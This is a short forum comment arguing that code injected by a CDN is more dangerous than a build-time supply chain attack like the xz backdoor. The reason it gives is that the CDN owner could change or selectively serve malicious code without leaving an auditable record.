[cybrexalpha]

It's different because it's worse.

In a supply chain attack against a system that produces some artefact (a container image, an executable, a VM image, whatever) an attacker can't modify what was injected after the fact (without building in some kind of remote update/attack persistence into the injection). This means that it could be audited and found later, for example the various projects designed to scan for the xz backdoor in executables.

But with this not only could the "attacker" (the CDN owner) change what is injected at any future time, there's no record of what was done as the author points out. A clever attacker could even selectively adjust what is sent based on the requester. They could distribute the unmodified code 99.99% of the time, but distribute malware 0.01% of the time — making it extremely hard to detect with simple 'spot checks'. They could exclude IPs known to be associated with the bank or CI systems from the malware distribution, so in-house malware checks would never see it.

Combined with other forms of intelligence, you could even build a system to target specific users with malware for very targeted attacks.